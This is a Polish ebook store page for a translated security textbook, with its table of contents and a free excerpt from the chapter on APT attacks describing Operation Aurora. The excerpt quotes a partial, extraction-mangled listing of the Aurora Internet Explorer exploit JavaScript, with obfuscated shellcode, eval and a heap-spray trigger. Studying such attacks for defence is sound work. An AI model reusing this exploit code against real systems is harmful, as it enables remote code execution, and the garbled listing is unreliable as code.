Cyfroteka.pl

klikaj i czytaj online

Cyfro
Czytomierz
00075 008653 10442499 na godz. na dobę w sumie
Vademecum hackingu. Skuteczna obrona sieci przed atakami. Wydanie VII - książka
Vademecum hackingu. Skuteczna obrona sieci przed atakami. Wydanie VII - książka
Autor: , , Liczba stron: 824
Wydawca: Helion Język publikacji: polski
ISBN: 978-83-246-6867-0 Data wydania:
Lektor:
Kategoria: ebooki >> komputery i informatyka >> hacking >> bezpieczeństwo sieci
Porównaj ceny (książka, ebook, audiobook).

Kompendium wiedzy o bezpieczeństwie systemów informatycznych!

Spróbuj wymyślić usługę, która w dzisiejszych czasach realizowana jest w sposób analogowy. Jeżeli chwilę się nad tym zastanowisz, dojdziesz do wniosku, że praktycznie każdy aspekt naszego życia uległ cyfryzacji. Tysiące informacji dotyczących naszej osoby i działalności codziennie są gromadzone w setkach systemów. Te dane w prawdziwym oraz wirtualnym świecie są nieustannie narażone na ataki. Najlepszym sposobem obrony jest poznanie technik i możliwości hakerów.

Z tej książki dowiesz się wszystkiego, co powinieneś wiedzieć o hakowaniu. W trakcie lektury poznasz najróżniejsze narzędzia oraz techniki prowadzenia ataków. Zyskasz niepowtarzalną okazję zgłębienia sposobów identyfikowania dostępnych usług oraz ich słabych punktów. W kolejnych rozdziałach zdobędziesz sporą wiedzę na temat hakowania systemów Windows oraz UNIX, aby przejść do technik zdobywania dostępu do infrastruktury. Hakowanie sieci bezprzewodowych, połączeń VPN oraz VoIP to tylko niektóre z obszarów omawianych przez autorów. Dodatkowym atutem książki jest przekazywanie cennych informacji na temat słabości urządzeń mobilnych.

Obowiązkowe kompendium dla wszystkich osób w jakikolwiek sposób związanych z bezpieczeństwem danych, sieci i urządzeń.

Zobacz, jak łatwo:

Zagwarantuj bezpieczeństwo Twoim danym!

Znajdź podobne książki Ostatnio czytane w tej kategorii

Darmowy fragment publikacji:

Tytuł oryginalny: Hacking Exposed™ 7: Network Security Secrets Solutions, Seventh Edition Tłumaczenie: Tomasz Walczak ISBN: 978-83-246-6867-0 Original edition copyright © 2012 by The McGraw-Hill Companies. All rights reserved. Polish edition copyright © 2013 by HELION SA All rights reserved. All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording or by any information storage retrieval system, without permission from the Publisher. Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną, fotograficzną, a także kopiowanie książki na nośniku filmowym, magnetycznym lub innym powoduje naruszenie praw autorskich niniejszej publikacji. Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli. Wydawnictwo HELION dołożyło wszelkich starań, by zawarte w tej książce informacje były kompletne i rzetelne. Nie bierze jednak żadnej odpowiedzialności ani za ich wykorzystanie, ani za związane z tym ewentualne naruszenie praw patentowych lub autorskich. Wydawnictwo HELION nie ponosi również żadnej odpowiedzialności za ewentualne szkody wynikłe z wykorzystania informacji zawartych w książce. Wydawnictwo HELION ul. Kościuszki 1c, 44-100 GLIWICE tel. 32 231 22 19, 32 230 98 63 e-mail: helion@helion.pl WWW: http://helion.pl (księgarnia internetowa, katalog książek) Pliki z przykładami omawianymi w książce można znaleźć pod adresem: ftp://ftp.helion.pl/przyklady/wszyha.zip Drogi Czytelniku! Jeżeli chcesz ocenić tę książkę, zajrzyj pod adres http://helion.pl/user/opinie/wszyha Możesz tam wpisać swoje uwagi, spostrzeżenia, recenzję. Printed in Poland. • Kup książkę • Poleć książkę • Oceń książkę • Księgarnia internetowa • Lubię to! » Nasza społeczność SPIS TRE¥CI O autorach ........................................................................................................................11 O współautorach ..............................................................................................................13 O recenzentach technicznych ........................................................................................17 Przedmowa .......................................................................................................................19 Wprowadzenie .................................................................................................................23 CzÚĂÊ I Badanie Ărodowiska Studium przypadku .........................................................................................................28 Najważniejsza jest anonimowość, głupcze! ..................................................28 Tor-turowanie niewinnych .............................................................................29 T 1. Footprinting .............................................................................................................33 Czym jest footprinting? ..................................................................................................34 Dlaczego footprinting jest niezbędny? ..........................................................35 Footprinting internetu ....................................................................................................35 Krok 1. Ustalenie zakresu działań ..................................................................35 Krok 2. Zadbaj o odpowiednie uprawnienia ................................................37 Krok 3. Publicznie dostępne informacje .......................................................37 Krok 4. WHOIS i wyliczanie DNS .................................................................55 Krok 5. Badanie nazw DNS ............................................................................64 Krok 6. Rekonesans sieci .................................................................................71 Podsumowanie .................................................................................................................75 T 2. Skanowanie ............................................................................................................77 Ustalanie, czy system jest aktywny ................................................................................78 Odkrywanie hostów za pomocą protokołu ARP .........................................79 Odkrywanie hostów z wykorzystaniem protokołu ICMP ..........................81 Odkrywanie hostów za pomocą protokołów TCP i UDP ..........................86 Kup książkęPoleć książkę 6 Vademecum hackingu. Skuteczna obrona sieci przed atakami Ustalanie, które usługi działają lub oczekują na pakiety ............................................92 Rodzaje skanowania ........................................................................................93 Identyfikowanie działających usług TCP i UDP .........................................95 Wykrywanie systemu operacyjnego ............................................................................103 Identyfikowanie systemu na podstawie dostępnych portów ...................104 Aktywny fingerprinting stosu ......................................................................105 Pasywny fingerprinting stosu .......................................................................109 Przetwarzanie i przechowywanie danych ze skanowania ........................................111 Zarządzanie danymi ze skanowania za pomocą Metasploita ..................112 Podsumowanie ...............................................................................................................114 T 3. Wyliczanie ............................................................................................................115 Fingerprinting usług .....................................................................................................117 Skanery luk .....................................................................................................................119 Proste przechwytywanie banerów ...............................................................................122 Wyliczanie popularnych usług sieciowych ................................................................125 Podsumowanie ...............................................................................................................193 CzÚĂÊ II Hakowanie punktów koñcowych i serwera Studium przypadku — międzynarodowa intryga .....................................................196 T 4. Hakowanie systemu Windows ...............................................................................199 Przegląd ...........................................................................................................................201 Co zostało pominięte w tym rozdziale? ......................................................202 Ataki bez uwierzytelniania ...........................................................................................202 Ataki przez fałszowanie danych uwierzytelniających ...............................203 Zdalne ataki bez uwierzytelniania ...............................................................221 Ataki z uwierzytelnianiem ............................................................................................229 Zwiększanie uprawnień .................................................................................229 Zdobywanie i łamanie haseł .........................................................................231 Zdalna kontrola i „furtki” .............................................................................247 Przekierowywanie portów ............................................................................252 Zacieranie śladów ...........................................................................................254 Ogólne zabezpieczenia przed atakami z uwierzytelnianiem ....................257 Funkcje bezpieczeństwa w systemie Windows ..........................................................262 Zapora systemu Windows ............................................................................262 Automatyczne aktualizacje ...........................................................................262 Centrum zabezpieczeń ..................................................................................263 Zasady zabezpieczeń i zasady grupy ............................................................264 Microsoft Security Essentials ........................................................................267 Pakiet EMET ...................................................................................................267 Bitlocker i system EFS ...................................................................................267 Windows Resource Protection .....................................................................269 Kup książkęPoleć książkę Spis treĂci 7 Poziomy integralności, kontrola konta użytkownika i tryb PMIE .........270 Funkcja DEP (ang. Data Execution Prevention) .......................................273 Windows Service Hardening ........................................................................273 Rozszerzenia związane z kompilatorem .....................................................278 Zakończenie — ciężar zabezpieczania systemu Windows .......................279 Podsumowanie ...............................................................................................................279 T 5. Hakowanie systemu UNIX ......................................................................................283 Przejmowanie konta administratora ..........................................................................284 Krótkie wprowadzenie ..................................................................................285 Mapowanie luk ...............................................................................................285 Dostęp zdalny a dostęp lokalny ....................................................................286 Dostęp zdalny .................................................................................................................287 Ataki oparte na danych .................................................................................292 Gdzie jest moja powłoka? .............................................................................310 Popularne typy zdalnych ataków .................................................................315 Dostęp lokalny ...............................................................................................................335 Po włamaniu na konto administratora .......................................................................353 Przywracanie stanu po ataku rootkita .........................................................369 Podsumowanie ...............................................................................................................370 T 6. CyberprzestÚpstwa i ataki APT ...............................................................................373 Czym jest atak APT? .....................................................................................................375 Operacja Aurora .............................................................................................379 Grupa Anonymous ........................................................................................382 RBN ..................................................................................................................383 Czym ataki APT NIE są? ..............................................................................................384 Przykładowe popularne narzędzia i techniki z obszaru APT ..................................384 Typowe oznaki ataków APT ........................................................................................424 Podsumowanie ...............................................................................................................430 CzÚĂÊ III Hakowanie infrastruktury Studium przypadku — WEP-owe przygody ..............................................................432 T 7. Zdalna komunikacja i hakowanie poïÈczeñ VoIP .....................................................437 Przygotowania do dzwonienia .....................................................................................439 Wardialing ......................................................................................................................441 Sprzęt ...............................................................................................................441 Kwestie prawne ..............................................................................................443 Dodatkowe koszty ..........................................................................................443 Oprogramowanie ...........................................................................................444 Kup książkęPoleć książkę 8 Vademecum hackingu. Skuteczna obrona sieci przed atakami Skrypty do przeprowadzania ataków siłowych — nasz sposób ..............................459 Końcowe uwagi na temat skryptów do przeprowadzania ataków siłowych ..........................................................................................470 Hakowanie systemów PBX ...........................................................................................472 Hakowanie poczty głosowej .........................................................................................476 Hakowanie sieci VPN ...................................................................................................482 Wprowadzenie do sieci VPN IPSec .............................................................483 Hakowanie sieci VPN opartych na oprogramowaniu firmy Citrix ........489 Ataki na technologię VoIP ...........................................................................................510 Atakowanie sieci VoIP ..................................................................................511 Podsumowanie ...............................................................................................................533 T 8. Hakowanie sieci bezprzewodowych .......................................................................535 Wprowadzenie ...............................................................................................................537 Częstotliwości i kanały ..................................................................................537 Nawiązywanie sesji ........................................................................................538 Mechanizmy zabezpieczeń ...........................................................................539 Wyposażenie ..................................................................................................................541 Bezprzewodowe karty sieciowe ....................................................................542 Systemy operacyjne ........................................................................................543 Różne narzędzia .............................................................................................544 Odkrywanie i monitorowanie ......................................................................................546 Znajdowanie sieci bezprzewodowych .........................................................546 Podsłuchiwanie danych w sieciach bezprzewodowych ............................550 Ataki przez odmowę usługi ..........................................................................................552 Ataki na sieci z obsługą szyfrowania ...........................................................................553 WEP .................................................................................................................554 Ataki na sieci z uwierzytelnianiem ..............................................................................558 WPA-PSK .......................................................................................................559 WPA Enterprise .............................................................................................564 Podsumowanie ...............................................................................................................569 T 9. Hakowanie sprzÚtu ................................................................................................571 Dostęp fizyczny — przedostawanie się przez drzwi .................................................572 Hakowanie urządzeń .....................................................................................................579 Konfiguracje domyślne .................................................................................................584 Podatny na atak od wyjęcia z pudełka ........................................................584 Standardowe hasła .........................................................................................584 Bluetooth .........................................................................................................585 Inżynieria wsteczna sprzętu .........................................................................................585 Odwzorowywanie urządzenia ......................................................................586 Podsłuchiwanie danych przesyłanych magistralą .....................................590 Kup książkęPoleć książkę Spis treĂci 9 Podsłuchiwanie interfejsu bezprzewodowego ...........................................592 Inżynieria wsteczna firmware’u ...................................................................594 Emulatory sprzętowe .....................................................................................599 Podsumowanie ...............................................................................................................602 CzÚĂÊ IV Hakowanie aplikacji i danych T 10. Hakowanie aplikacji sieciowych i baz danych .........................................................607 Hakowanie serwerów WWW ......................................................................................608 Przykładowe pliki ...........................................................................................610 Ujawnienie kodu źródłowego ......................................................................611 Ataki związane z przekształcaniem na postać kanoniczną ......................611 Rozszerzenia serwerów .................................................................................612 Przepełnienie bufora ......................................................................................615 Odmowa usługi ..............................................................................................616 Skanery luk serwerów WWW ......................................................................617 Hakowanie aplikacji sieciowych ..................................................................................618 Znajdowanie podatnych na atak aplikacji sieciowych za pomocą wyszukiwarki Google (Googledorks) ...................................619 Przeszukiwanie sieci WWW .........................................................................621 Ocenianie aplikacji sieciowych ....................................................................623 Luki często występujące w aplikacjach sieciowych ...................................................636 Hakowanie baz danych .................................................................................................651 Wykrywanie baz danych ...............................................................................652 Luki w bazach danych ...................................................................................653 Inne uwagi .......................................................................................................668 Podsumowanie ...............................................................................................................670 T 11. Hakowanie rozwiÈzañ mobilnych ...........................................................................671 Hakowanie Androida ....................................................................................................673 Wprowadzenie do Androida ........................................................................675 Hakowanie własnych urządzeń z Androidem ...........................................681 Hakowanie cudzych urządzeń z Androidem .............................................698 Android jako przenośna platforma do hakowania ....................................720 Zabezpieczanie urządzeń z Androidem ......................................................723 System iOS ......................................................................................................................725 Poznaj swojego iPhone’a ...............................................................................726 Jak bezpieczny jest system iOS? ...................................................................728 Jailbreaking — uwolnij moc! ........................................................................729 Hakowanie cudzych iPhone’ów — uwolniona moc! ................................735 Podsumowanie ...............................................................................................................753 Kup książkęPoleć książkę 10 Vademecum hackingu. Skuteczna obrona sieci przed atakami T 12. KsiÚga zabezpieczeñ .............................................................................................755 Ogólne strategie .............................................................................................................757 Przenoszenie i usuwanie zasobów ...............................................................758 Podział zadań ..................................................................................................758 Uwierzytelnianie, autoryzacja i inspekcja ...................................................760 Stosowanie warstw .........................................................................................761 Dynamiczne wzbogacanie ............................................................................762 Kontrolowane awarie ....................................................................................763 Zasady i szkolenia ..........................................................................................763 Proste, tanie i łatwe ........................................................................................764 Przykładowe scenariusze ..............................................................................................765 Scenariusze związane z komputerami stacjonarnymi ...............................765 Scenariusze związane z serwerem ................................................................766 Scenariusze związane z siecią .......................................................................772 Scenariusze związane z aplikacjami sieciowymi i bazami danych ..........774 Scenariusze związane z rozwiązaniami mobilnymi ...................................775 Podsumowanie ...............................................................................................................776 Dodatki T A Porty ....................................................................................................................781 T B DziesiÚÊ najwaĝniejszych luk bezpieczeñstwa ........................................................789 T C Odmowa usïugi i rozproszone ataki przez odmowÚ usïugi .......................................793 Zabezpieczenia ...............................................................................................................797 T S Skorowidz .............................................................................................................801 Kup książkęPoleć książkę ROZDZIA’ 6. CyberprzestÚpstwa i ataki APT Kup książkęPoleć książkę 374 Vademecum hackingu. Skuteczna obrona sieci przed atakami P ojęcie APT (ang. Advanced Persistant Threats) ostatnio znacznie zyskało na popularności. APT oznacza powtarzający się nieuwierzytelniony dostęp do korporacyjnych sieci. Określenie to trafiło na nagłówki gazet i było powodem wielu bezsennych nocy licznych informatyków odpowiedzialnych za bezpieczeństwo. Jednak samo zagadnienie nie jest niczym nowym. Jeśli byłeś jednym ze szczęściarzy, którzy w 1999 roku kupili pierwsze wydanie książki Hacking Exposed, i otworzyłeś tylną okładkę, mogłeś zobaczyć schemat zatytułowany Anatomy of a Hack. Pokazano na nim prosty proces metodycznego namierzania i atakowania sieci przez hakerów. Choć na diagramie nie przedstawiono eksploitów typu zero-day, omówiono je szcze- gółowo w tekście książki. Opis ten w połączeniu ze schematem Anatomy of a Hack był zapowiedzią tego, co później nazwano atakami APT. Obecnie pojęcie APT stosuje się często niepoprawnie, określając tym mianem popularne szkodliwe oprogramowanie, np. robaki i trojany oparte na skomplikowa- nych technikach lub zaawansowanych rozwiązaniach programistycznych, które pozwa- lają napastnikom ominąć programy antywirusowe i inne aplikacje zabezpieczające oraz działają w systemie przez długi czas. W rzeczywistości ataki APT polegają na zastosowaniu przez hakera zaawansowanych narzędzi do włamania się do systemu, przy czym mają pewną dodatkową cechę — są przeprowadzane w jakimś ważnym celu. Większość hakerów chce uzyskać dostęp do systemu, wykonać zaplanowane operacje i usunąć określone dane. W atakach APT celem jest wykorzystywanie systemu przez długi czas. Pamiętaj jednak, że atak APT nie musi być ani zaawansowany (ang. advanced), ani trwały (ang. persistent). Ataki APT są przeciwieństwem oportunistycznych włamań popularnych na początku obecnego wieku (wykorzystywano w nich techniki w rodzaju hakowania za pomocą zapytań do wyszukiwarki, tzw. Google hacking, pozwalających znaleźć nie- zabezpieczone maszyny). Ataki APT są zaplanowane, wymierzone w konkretny cel i prowadzone przez zorganizowane grupy oraz mają przynieść określone skutki (w tym stały dostęp). Wykrycie konkretnych narzędzi często pozwala podejrzewać, że ma miej- sce atak APT (choć nie daje takiej pewności), ponieważ różni napastnicy stosują w trakcie działań podobne pakiety. Może to pomóc powiązać zagrożenie z konkretną grupą. Na ogólnym poziomie ataki APT można podzielić na dwie kategorie w zależności od zamiarów napastników. Pierwsza grupa koncentruje się na działalności przestęp- czej i jest zainteresowana danymi osobowymi oraz (lub) finansowymi, a także posia- danymi przez firmy informacjami, które można wykorzystać do podszywania się, oszustw finansowych lub kradzieży. Druga grupa zajmuje się wywiadem gospodar- czym lub szpiegostwem na rzecz państw (czasem obszary te zachodzą na siebie). W ramach tych działań są przejmowane zastrzeżone i zwykle niedostępne publicznie informacje, np. własność intelektualna i tajemnice handlowe. Pozwala to wprowadzać Kup książkęPoleć książkę Rozdziaï 6. CyberprzestÚpstwa i ataki APT 375 na rynek konkurencyjne produkty i usługi oraz projektować strategie rywalizacji z okradzionymi firmami lub reagowania na możliwości tych organizacji. Ataki APT mogą być wymierzone w organizacje społeczne, polityczne, rządowe lub przemysłowe — i często są. Informacje dają władzę, a dostęp do danych na temat konkurencji i kontrolowanie ich zapewnia dużo możliwości. To właśnie jest ostateczny cel ataków APT — zdobyć i utrzymać dostęp do ważnych dla napastników informacji. Niezależnie od tego, czy działania są prowadzone w ramach wspieranego przez pań- stwo szpiegostwa przemysłowego lub zorganizowanej przestępczości, czy przez nie- zadowolone grupy społeczne, metody i techniki ataków APT są bardzo podobne, dlatego można je rozpoznać i odróżnić od przypadkowych infekcji komputerów szko- dliwym oprogramowaniem. Warto powtórzyć ten ważny punkt — ataki APT to nie szkodliwe oprogramo- wanie. W wielu sytuacjach napastnicy nawet nie stosują oprogramowania tego rodzaju, przy czym niektórzy hakerzy lubią posługiwać się pewnymi narzędziami, co pomaga analitykom i śledczym powiązać ataki z określonymi grupami (a także znaleźć pozo- stałości i dowody operacji wielokrotnie przeprowadzanych przez napastników). Ataki APT to działania prowadzone przez zorganizowaną grupę w celu uzyskania (trwałego) dostępu do konkretnego systemu i kradzieży informacji dla potrzeb finansowych, społecznych, przemysłowych, politycznych lub konkurencyjnych. CZYM JEST ATAK APT? Pojęcie Advanced Persistent Threat (APT; zaawansowane trwałe zagrożenie) zostało utworzone przez analityków z amerykańskich Sił Powietrznych w 2006 roku. Opisuje ono trzy aspekty ataków związane z profilem, zamiarami i strukturą grupy napastników. x Zaawansowane. Napastnik jest biegły w metodach cyberataków i technikach administracyjnych. Potrafi rozwijać niestandardowe eksploity i narzędzia. x Trwałe. Napastnik ma długoterminowe cele i stara się je osiągnąć, unikając x Zagrożenie. Napastnicy są zorganizowani, mają duże środki, motywację przy tym wykrycia. i możliwości. Ataki APT, jak wcześniej wspomnieliśmy, to działania zorganizowanej grupy, która ma nieuwierzytelniony dostęp do systemów informacyjnych i łączy komuni- kacyjnych oraz może nimi manipulować. Celem jest kradzież cennych informacji, które można wykorzystać w różny sposób. Ataki APT są związane ze szpiegostwem, wywiadem gospodarczym i brudnymi sztuczkami. Są formą szpiegostwa, która daje dostęp do cyfrowych zasobów. Napastnicy starają się usunąć przeszkody na drodze do uzyskania tego dostępu, dlatego rzadko uciekają się do sabotażu. Hakerzy mogą jednak posługiwać się różnymi technikami zacierania śladów działań w dziennikach Kup książkęPoleć książkę 376 Vademecum hackingu. Skuteczna obrona sieci przed atakami systemowych i mogą nawet uszkodzić system operacyjny lub system plików. Narzę- dzia APT różnią się od innego szkodliwego oprogramowania, ponieważ wykorzystują normalne funkcje systemu operacyjnego i są widoczne w systemie plików. Grupy przeprowadzające ataki APT nie chcą, aby ofiara wykryła wykorzystywane przez nie narzędzia lub techniki. Dlatego nie chcą blokować ani zakłócać normalnego działania systemu w atakowanych hostach. Zamiast tego stosują dyskretne techniki ataku, penetracji, rekonesansu, poruszania się w poziomie, administrowania i wypro- wadzania danych. Techniki te zazwyczaj odzwierciedlają podobne administracyjne lub operacyjne działania atakowanej firmy, choć odkryto, że niektóre grupy stosują w swoich operacjach konkretne narzędzia. W niektórych sytuacjach ataki APT pomo- gły zaatakowanym firmom (nieświadomie) zabezpieczyć systemy przed szkodliwym oprogramowaniem lub atakami APT ze strony innych grup. Choć stosowane techniki są dyskretne, nie dotyczy to pozostałości po przepro- wadzonych działaniach. Np. najpopularniejszą metodą uzyskiwania dostępu do doce- lowych sieci w atakach APT jest ukierunkowany phising (ang. spear-phishing). Tech- nika ta jest oparta na e-mailach, dlatego — często w wielu miejscach — pozostają ślady po wiadomościach, zastosowanej metodzie ataku oraz adresach i protokołach wykorzystywanych do komunikowania się z komputerami napastników. E-maile prze- syłane w ukierunkowanym phishingu mogą obejmować szkodliwe oprogramowanie, które próbuje zaatakować aplikacje z komputera użytkownika. Mogą też kierować użytkownika (na podstawie pewnych informacji identyfikujących jego tożsamość) na serwer udostępniający niestandardowe szkodliwe oprogramowanie, które umożliwia hakerom dalsze działania w ramach ataku APT. Napastnicy zwykle wykorzystują wcześniej przejęte sieci komputerów jako pod- stawione systemy, aby ukryć się za nimi, gdy przesyłają instrukcje i sterują atakiem. Jednak adresy podstawionych serwerów mogą okazać się ważnymi poszlakami pomoc- nymi przy ustalaniu tożsamości danej grupy. Także systemy pocztowe używane do ukierunkowanego phishingu, a nawet stosowane eksploity (zwykle programy do insta- lowania trojanów — ang. trojan dropper) mogą działać w modelu „płatności za insta- lację” lub „leasingu”. Mimo to podobne adresy, metody i eksploity w połączeniu z innymi informacjami ustalonymi w trakcie śledztwa często pozwalają powiązać z atakiem konkretne grupy. Inne popularne techniki stosowane w atakach APT to wstrzykiwanie kodu w SQL-u w docelowych witrynach, posługiwanie się „metaeksploitami” serwerów WWW, phish- ingiem, eksploitami aplikacji używanych w sieciach społecznościowych, a także stan- dardowe metody z obszaru inżynierii społecznej, np. podawanie się za użytkownika w rozmowach z pomocą techniczną, podrzucanie zainfekowanych pendrive’ów, roz- dawanie zainfekowanego sprzętu lub oprogramowania, a w skrajnych przypad- kach tradycyjne szpiegowanie przez zwykłych lub kontraktowych pracowników. Ataki APT zawsze obejmują pewne aspekty inżynierii społecznej. Inżynieria społeczna — Kup książkęPoleć książkę Rozdziaï 6. CyberprzestÚpstwa i ataki APT 377 niezależnie od tego, czy ogranicza się do korzystania z adresów e-mail z publicznych stron internetowych, czy polega na szpiegostwie korporacyjnym przez pracowników kon- traktowych — pozwala poznać cel i pomaga napastnikom opracować strategie dostępu do docelowych systemów operacyjnych, wykorzystania luk i wydobycia danych. Ataki APT zawsze obejmują kilka etapów, po których pozostają ślady. Oto te fazy: 1. Namierzanie. Napastnicy zbierają informacje o celu ze źródeł publicznych lub prywatnych i sprawdzają metody, które mogą pomóc w uzyskaniu dostępu. Posługują się przy tym skanowaniem luk (przez testy bezpieczeństwa aplikacji i ataki typu DDoS), inżynierią społeczną lub ukierunkowanym phishingiem. Celem może być konkretna firma lub jej partner (który może umożliwić pośredni dostęp do docelowej organizacji przez sieci biznesowe). 2. Uzyskanie dostępu i włamanie. Napastnicy uzyskują dostęp i ustalają najwydajniejsze lub najskuteczniejsze metody wykorzystania systemów informacyjnych i stanu zabezpieczeń docelowej organizacji. Na tym etapie określają dane identyfikacyjne zaatakowanego hosta (adres IP, nazwę DNS, wyliczone udziały NetBIOS-a, adresy serwerów DNS i DHCP, system operacyjny itd.), a także w miarę możliwości zbierają dane uwierzytelniające i profile, co pomaga w dalszych włamaniach. Napastnicy mogą próbować ukryć swoje zamiary, instalując programy typu rogueware lub inne szkodliwe oprogramowanie. 3. Rekonesans. Napastnicy wyliczają udziały sieciowe, odkrywają architekturę sieci, usługi tłumaczenia nazw, kontrolery domeny, a także sprawdzają, czy usługi i administrator mają uprawnienia dostępu do innych systemów i aplikacji. Hakerzy mogą próbować włamać się na konta Active Directory lub lokalnych administratorów z uprawnieniami do domeny. Napastnicy często starają się ukryć działania przez wyłączenie programu antywirusowego i dzienników systemowych (zjawiska te mogą wskazywać na włamanie). 4. Poruszanie się w poziomie. Gdy napastnicy ustalili już sposoby poruszania się po systemach za pomocą danych uwierzytelniających oraz zidentyfikowali cele (łatwe do zaatakowania lub dostosowane do zamiarów), zaczynają przechodzić w poziomie do innych hostów z sieci. Etap ten nie wymaga stosowania szkodliwego oprogramowania ani specjalnych aplikacji. Wystarczą rozwiązania dostępne w systemach operacyjnych przejętych hostów, np. powłoka poleceń, instrukcje NetBIOS-a, usługi terminalowe systemu Windows, sieci VNC lub inne podobne narzędzia używane przez administratorów sieci. 5. Zbieranie i wyprowadzanie danych. Napastników interesują informacje — niezależnie od tego, czy służą do dalszego namierzania ofiar, utrzymania dostępu lub innych celów, hakerzy chcą zdobyć i ukraść dane. Napastnicy często tworzą „punkty zbierania danych” i wyprowadzają informacje za pomocą podstawionych sieci pośredniczących. Czasem stosuje się też niestandardowe Kup książkęPoleć książkę 378 Vademecum hackingu. Skuteczna obrona sieci przed atakami techniki szyfrowania (i szkodliwe oprogramowanie), aby utrudnić zrozumienie plików danych i powiązanych połączeń, przez które są wyprowadzane informacje. W wielu sytuacjach napastnicy wykorzystują istniejące oprogramowanie do tworzenia kopii zapasowych i inne narzędzia administracyjne, którymi posługują się administratorzy sieci i systemów w zaatakowanej organizacji. Wyprowadzanie danych odbywa się fragment po fragmencie lub w dużych porcjach. Zależy to od tego, czy napastnikowi się spieszy i czy jego zdaniem firma potrafi wykryć kradzież danych. 6. Administrowanie i konserwacja narzędzi. Innym celem w atakach APT jest utrzymanie dostępu. Wymaga to administrowania narzędziami (szkodliwym oprogramowaniem i potencjalnie niepożądanymi lub przydatnymi programami, np. pakietem Sysinternals) i danymi uwierzytelniającymi oraz ich konserwowania. Napastnicy przygotowują kilka różnych dróg zdalnego dostępu do sieci oraz tworzą flagi i wyzwalacze informujące o zmianach w architekturze systemu. Pozwala to na podjęcie odpowiednich działań, takich jak namierzanie nowych celów i włamywanie się do nich, a także przeprowadzanie pozornych ataków z wykorzystaniem szkodliwego oprogramowania, aby odwrócić uwagę pracowników firmy. Napastnicy zwykle próbują usprawniać metody dostępu, by były jak najbardziej zbliżone do działań standardowych użytkowników. Niepożądane jest ciągłe poleganie na specjalnych narzędziach i szkodliwym oprogramowaniu. Jak wspomnieliśmy, po próbach dostępu mogą pozostać e-maile, wpisy w dzien- nikach serwera WWW i na ścieżkach komunikacyjnych oraz inne ślady związane z zastosowanymi technikami. Także rekonesans i poruszanie się w poziomie pozo- stawiają artefakty wynikające z nadużywania danych uwierzytelniających (reguł) lub tożsamości (ról). Zwykle ślady te znajdują się w dziennikach zdarzeń z obszaru bezpieczeństwa i dziennikach historii aplikacji. Wyprowadzanie danych pozostawia artefakty związane z protokołami i adresami w dziennikach zapory, w dziennikach systemów IDS (na poziomie hostów i sieci), dziennikach systemu zapobiegania wycie- kaniu danych, dziennikach historii aplikacji oraz dziennikach serwerów WWW. Wspomniane ślady zwykle są dostępne w aktywnych systemach plików (jeśli admi- nistrator wie, gdzie i czego szukać), jednak czasem można je odkryć tylko w ramach sądowych badań zaatakowanych systemów. Techniki stosowane w atakach APT zasadniczo nie różnią się od technik admi- nistracyjnych i operacyjnych używanych w korporacyjnych systemach informatycz- nych. Dlatego nieuprawniony napastnik pozostawia w systemie plików i innych dzien- nikach te same ślady co upoważniony użytkownik. Jednak nieuprawnione osoby muszą przeprowadzać eksperymenty lub korzystać z dodatkowych narzędzi, aby uzyskać dostęp i wykorzystać system. Dlatego pozostają po nich pewne anomalie, które nie występują w danych dotyczących uprawnionych użytkowników. Kup książkęPoleć książkę Rozdziaï 6. CyberprzestÚpstwa i ataki APT 379 W ostatnich pięciu latach wykryto kilka długotrwałych ataków APT przeprowa- dzonych przez nieznanych sprawców na różne jednostki przemysłowe i rządkowe z całego świata. Ataki te otrzymały nazwy nadane przez śledczych (Aurora, Nitro, ShadyRAT, Lurid, Night Dragon, Stuxnet i DuQu). Każda z akcji obejmowała dzia- łania operacyjne, w tym dostęp, rekonesans, poruszanie się w poziomie, manipulo- wanie systemami informatycznymi i wyprowadzanie prywatnych lub zastrzeżonych danych. W trzech następnych podpunktach omawiamy trzy ataki APT. Operacja Aurora Popularność Łatwość przeprowadzenia Szkodliwość Ocena zagrożenia 1 1 10 4 W 2009 roku amerykańskie firmy z branży technologicznej i zbrojeniowej stały się ofiarą włamania do sieci oraz systemów zarządzania konfiguracją oprogramowania. Doprowadziło to do kradzieży wysoce poufnych informacji. Z firm Google, Juniper, Adobe i przynajmniej 29 innych przez aż sześć miesięcy wyciekały tajemnice han- dlowe i ważne dla konkurencji dane. Dopiero wtedy organizacje wykryły kradzież i podjęły działania w celu powstrzymania ataku APT. Napastnicy uzyskali dostęp do sieci ofiar za pomocą e-maili z ukierunkowanym phishingiem wysyłanych do pracowników firm. E-maile te obejmowały odnośnik do tajwańskiej witryny, w której znajdował się szkodliwy kod w JavaScripcie. Gdy odbiorca wiadomości kliknął odnośnik i otworzył witrynę, kod wykorzystywał lukę w przeglą- darce Internet Explorer, co pozwalało na zdalne wykonywanie kodu przez dostęp do częściowo zwolnionej pamięci. Szkodliwy kod nie był wykrywany przez programy antywirusowe. Działał przez wstrzykiwanie kodu powłoki z następującymi instrukcjami: html script var sc = unescape( u9090 ... ... ubcb9 ub2f6 ubfa8 u00d8 ); var sss = Array(826, 679, ... ...735, 651, 427, 770, 301, 805, 693, 413, 875); var arr = new Array; for (var i = 0; i sss.length; i ++){ arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ); cc = cc.replace(/@/g, , ); eval(cc); var xl = new Array(); for (i = 0; i 200; i ++){ xl[i] = document.createElement( COMMENT ); xl[i].data = abc ; }; var el = null; Kup książkęPoleć książkę 380 Vademecum hackingu. Skuteczna obrona sieci przed atakami function ev1(evt){ el = document.createEventObject(evt); document.getElementById( sp1 ).innerHTML = ; windows.setInterval(ev2, 50); } function ev2(){ p = \u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c 0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\\u0c0d\ u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\\u0c0d\u0c 0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\ u0c0d ; for (i = 0; i xl.length; i ++ ){ 